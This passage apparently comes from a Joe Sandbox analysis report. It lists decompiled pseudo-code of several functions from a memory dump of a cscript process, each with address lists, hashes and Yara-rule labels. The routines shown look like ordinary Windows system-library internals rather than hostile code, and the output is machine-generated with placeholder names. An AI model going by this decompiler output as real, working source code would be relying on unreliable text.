				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x55a87e4;
					_t18 =  *0x55a87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x55a5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x55a87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x55a87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L054B7055(_t31 + 0xfffffff8);
								_t24 =  *0x55a87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x55a87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x55a5cd0;
				if( *0x55a5cd0 <= 0) {
					L054B7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x55a87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x55a87e8 = _t30;
						 *0x55a87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0550D0D1(L05544320());
			}

0x05544257
0x05544257
0x05544257
0x05544259
0x0554425e
0x05544263
0x05544265
0x05544273
0x05544278
0x0554427c
0x0554427f
0x05544281
0x05544287
0x055442d7
0x055442d7
0x055442da
0x0554428d
0x0554428d
0x0554428f
0x05544292
0x05544297
0x0554429c
0x055442a0
0x055442a6
0x055442a8
0x055442ae
0x055442b3
0x00000000
0x055442ba
0x055442ba
0x055442bf
0x055442c5
0x055442ca
0x055442cf
0x055442d0
0x00000000
0x055442d0
0x055442b3
0x00000000
0x055442a6
0x0554429c
0x055442dc
0x055442dc
0x055442e3
0x05544309
0x055442e5
0x055442e5
0x055442e8
0x055442ee
0x055442f0
0x00000000
0x055442f2
0x055442f2
0x055442f4
0x055442f7
0x055442f9
0x05544300
0x05544300
0x055442f0
0x0554430e
0x0554431f

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 051aba5dbb03b3a4e75177cf09bb63f51fa9d21e793a1d3284ae6185d5f9fbbf
Instruction ID: a1419795a9e1a640d32ba0ea1989477dc8904ed8126c99d2218475c8c2329d3a
Opcode Fuzzy Hash: 051aba5dbb03b3a4e75177cf09bb63f51fa9d21e793a1d3284ae6185d5f9fbbf
Instruction Fuzzy Hash: E2216DB0A55601DFDB1ADFA4D045B687BF1FB85318F50826FD1099B294EB329485DF40

Uniqueness

Uniqueness Score: -1.00%

Function 055346A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E055346A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L054D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E054FF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E054ED268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L054D77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x055346b7
0x055346ba
0x055346c5
0x055346c8
0x055346d0
0x055346d4
0x055346e6
0x055346e9
0x055346f4
0x055346ff
0x05534705
0x05534706
0x0553470c
0x05534713
0x0553471b
0x05534723
0x05534725
0x055346d6
0x055346d9
0x055346db
0x055346db
0x05534732

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 6a59733a9a68285a161e83b8cdf25116ac57f934ae27ed71143f08899270a670
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 5011C272A04208BBCB059F5D98809BEFBB9EF95300F10806EF9448B350DA319D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 054E2397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E054E2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x55a848c != 0) {
					L054DFAD0(0x55a8610);
					if( *0x55a848c == 0) {
						E054DFA00(0x55a8610, _t19, _t27, 0x55a8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E054E2581(0x55a8610, 0x54950a0, _t26, _t27, _t28);
						E054DFA00(0x55a8610, 0x54950a0, _t27, 0x55a8610);
					}
				} else {
					L1:
					_t11 =  *0x55a8614; // 0x1
					if(_t11 == 0) {
						_t11 = E054F4886(0x5491088, 1, 0x55a8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E054E2581(0x55a8610, (_t11 << 4) + 0x5495070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x054e23b0
0x054e23b6
0x054e2409
0x054e2415
0x05525ae9
0x00000000
0x054e241b
0x054e241b
0x054e241d
0x054e2427
0x054e242e
0x054e2430
0x054e2430
0x054e23b8
0x054e23b8
0x054e23b8
0x054e23bf
0x054e23fc
0x054e23fc
0x054e23c1
0x054e23c3
0x054e23d0
0x054e23d8
0x054e23d8
0x054e23dc
0x054e23de
0x054e23e1
0x054e23e1
0x054e23ec

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c650389045b0fc543f62f3a26801a6ec280b0ccf0721275dffb8d7e1a7caa927
Instruction ID: 01d1a995b997047e68b6e2e72b087249e84f22e78ba736c1cf166eeb86669d9c
Opcode Fuzzy Hash: c650389045b0fc543f62f3a26801a6ec280b0ccf0721275dffb8d7e1a7caa927
Instruction Fuzzy Hash: 7C116B3270C31067EB34963A9C85F96BADDBB90621F18446BF60397380CAF4EC058B64

Uniqueness

Uniqueness Score: -1.00%

Function 054F37F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E054F37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E054D2280(_t6, 0x55a8550);
				}
				_t29 = E054F387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E054CFFB0(0x55a8550, _t27, 0x55a8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x054f37fa
0x054f37fc
0x054f3805
0x054f3808
0x054f3808
0x054f3814
0x054f3818
0x054f3846
0x054f3848
0x054f384b
0x054f384b
0x054f3852
0x00000000
0x054f3854
0x054f3856
0x00000000
0x00000000
0x054f3863
0x00000000
0x054f3863
0x054f381a
0x054f381a
0x054f381f
0x054f386e
0x054f386e
0x054f3871
0x054f3873
0x054f3873
0x054f3868
0x00000000
0x054f3868
0x054f3821
0x054f3826
0x00000000
0x00000000
0x054f3828
0x054f382a
0x054f3841
0x00000000
0x054f3841

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e156355eab1e702776a85ebe69c56f5362f99c3dcc835d80b55e1073858cd99
Instruction ID: cbe34f184ab56e1eb2701cdd66b273f88f30e02bf0ac8d9de344f6857e3c9635
Opcode Fuzzy Hash: 3e156355eab1e702776a85ebe69c56f5362f99c3dcc835d80b55e1073858cd99
Instruction Fuzzy Hash: DA01C8B2A055105BC3278F1EA540EA7BBE7EF85A5071548AFEA458B311DB38DC01C790

Uniqueness

Uniqueness Score: -1.00%

Function 054BC962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E054BC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x55ad360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E054CEEF0(0x55a70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0553F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E054CEB70(_t29, 0x55a70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E054FB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0553F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x55a70c0; // 0x0
					while(_t38 != 0x55a70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x55ab1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x054bc96a
0x054bc974
0x054bc988
0x054bc98a
0x05527c9d
0x05527c9f
0x05527ca4
0x05527cae
0x05527cf0
0x05527cf5
0x05527cfa
0x054bc992
0x054bc996
0x054bc997
0x054bc998
0x054bc9a3
0x054bc9a3
0x05527cb0
0x05527cb7
0x05527cbb
0x00000000
0x00000000
0x05527cbd
0x05527ce8
0x05527cc5
0x05527cc8
0x05527cca
0x05527cd0
0x05527cd6
0x05527cde
0x05527ce4
0x05527ce4
0x05527cd0
0x00000000
0x05527ce8
0x054bc990
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b57baa6e2445a55e02a7e6605024c47d2407cb325f40052e4d114f5f5b865834
Instruction ID: 9157f112d44a140651916e0987e8ea18d45a3d45b1b73805fc3117581339e985
Opcode Fuzzy Hash: b57baa6e2445a55e02a7e6605024c47d2407cb325f40052e4d114f5f5b865834
Instruction Fuzzy Hash: 0E11CE327246169BC710EE39D88AA6B7BE6FB8D610F00052EF84993690DF20EC14DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 054E002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054E002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E054D7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E054D7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E054D7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E054D7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x054e0032
0x054e0037
0x054e0043
0x05524b3a
0x054e0049
0x054e0049
0x054e0049
0x054e004e
0x054e0053
0x05524b48
0x05524b5a
0x05524b4a
0x05524b53
0x05524b53
0x05524b5f
0x00000000
0x05524b61
0x00000000
0x05524b61
0x054e0059
0x054e0059
0x054e0060
0x05524b6f
0x05524b6f
0x054e0069
0x05524b83
0x00000000
0x00000000
0x05524b90
0x05524b9b
0x05524b9b
0x05524ba4
0x00000000
0x00000000
0x05524baa
0x00000000
0x054e006f
0x054e006f
0x00000000
0x054e006f
0x054e0069

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 42ebd750329522888977e75f61e175ff82d35e3bac7560d8b7592e7df3433136
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 72110E32205690CFDF238728D95CBB27796FB02B44F0900A2DC19D7AD2E36AC841C360

Uniqueness

Uniqueness Score: -1.00%

Function 054C766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E054C766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E054EF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E054EF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L054D4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x054c7672
0x054c767f
0x054c7689
0x054c76de
0x054c76de
0x054c768b
0x054c7691
0x054c7693
0x054c7697
0x00000000
0x054c7699
0x054c76a8
0x00000000
0x054c76aa
0x054c76ad
0x054c76b1
0x00000000
0x054c76b3
0x054c76b3
0x054c76b5
0x054c76ba
0x054c76bc
0x054c76bc
0x054c76c0
0x00000000
0x054c76c2
0x054c76ce
0x054c76ce
0x054c76c0
0x054c76b1
0x054c76a8
0x054c7697
0x054c76d9

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 16166e1df45d63b7f80a843ccc700b8628b8435adea6dcf6e40ffc11194df8b2
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 1A01D432300118BBC760DE5ECD44EDB7BADEBD4770B2441AEB909CB244DA30DC018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0554C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0554C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E054F9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E054F95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E054F95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E054F95D0();
				return L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0554c458
0x0554c45d
0x0554c466
0x0554c468
0x0554c469
0x0554c46a
0x0554c46b
0x0554c46e
0x0554c46f
0x0554c471
0x0554c476
0x0554c476
0x0554c47c
0x0554c47e
0x0554c480
0x0554c480
0x0554c483
0x0554c484
0x0554c486
0x0554c488
0x0554c48f
0x0554c491
0x0554c493
0x0554c493
0x0554c48f
0x0554c498
0x0554c49e
0x0554c4ad
0x0554c4ad
0x0554c4b2
0x0554c4b4
0x0554c4cd

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 00d0aaea5ca76411abfe09f345a27b3f75194554d9552e91f35c21a5c2644f8f
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 4A019E72241505BFD721AF6ACD84FA2F76DFF943A5F00452AF21446560CB22ACA0CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 054B9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E054B9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x55a85ec;
				E054D2280(_t48, 0x55a85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E054CFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x55a538c; // 0x77ad6888
					if( *_t84 != 0x55a5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x558f6e8);
						E0550D0E8(0x55a85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E055888F5(_t80, _t85, 0x55a5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x55a86c0; // 0x36b07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x55a86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E054D2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E055888F5(0x55a85ec, _t85, 0x55a5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E054FAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x55ab1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x55a84c0;
																			if(_t82 >=  *0x55a84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E05589063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E054B922A(_t99);
										_t64 = E054D7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E05588B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x55a86c0; // 0x36b07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x55a86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x55a86bc;
													_t87 = 0x55a86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E054B9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x55a86c4;
												_t87 = 0x55a86c0;
												L27:
												E054E9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0550D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x55a5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x55a538c = _t51;
						goto L6;
					}
				}
			}

0x054b9082
0x054b9083
0x054b9084
0x054b9085
0x054b9087
0x054b9096
0x054b9098
0x054b9098
0x054b909e
0x054b90a8
0x054b90e7
0x054b90e7
0x054b90aa
0x054b90b0
0x054b90b7
0x054b90bd
0x054b90dd
0x054b90e6
0x054b90bf
0x054b90bf
0x054b90c7
0x054b90cf
0x054b90f1
0x054b90f2
0x054b90f4
0x054b90f5
0x054b90f6
0x054b90f7
0x054b90f8
0x054b90f9
0x054b90fa
0x054b90fb
0x054b90fc
0x054b90fd
0x054b90fe
0x054b90ff
0x054b9100
0x054b9102
0x054b9107
0x054b910c
0x054b9110
0x054b9113
0x054b9115
0x054b9136
0x054b913f
0x054b9143
0x055137e4
0x055137e4
0x054b9117
0x054b9117
0x054b911d
0x00000000
0x054b911f
0x054b911f
0x054b9125
0x00000000
0x054b9127
0x054b912d
0x054b9130
0x054b9134
0x054b9158
0x054b915d
0x054b9161
0x054b9168
0x05513715
0x054b916e
0x054b916e
0x054b9175
0x054b9177
0x054b917e
0x054b917f
0x054b9182
0x054b9182
0x054b9187
0x054b9187
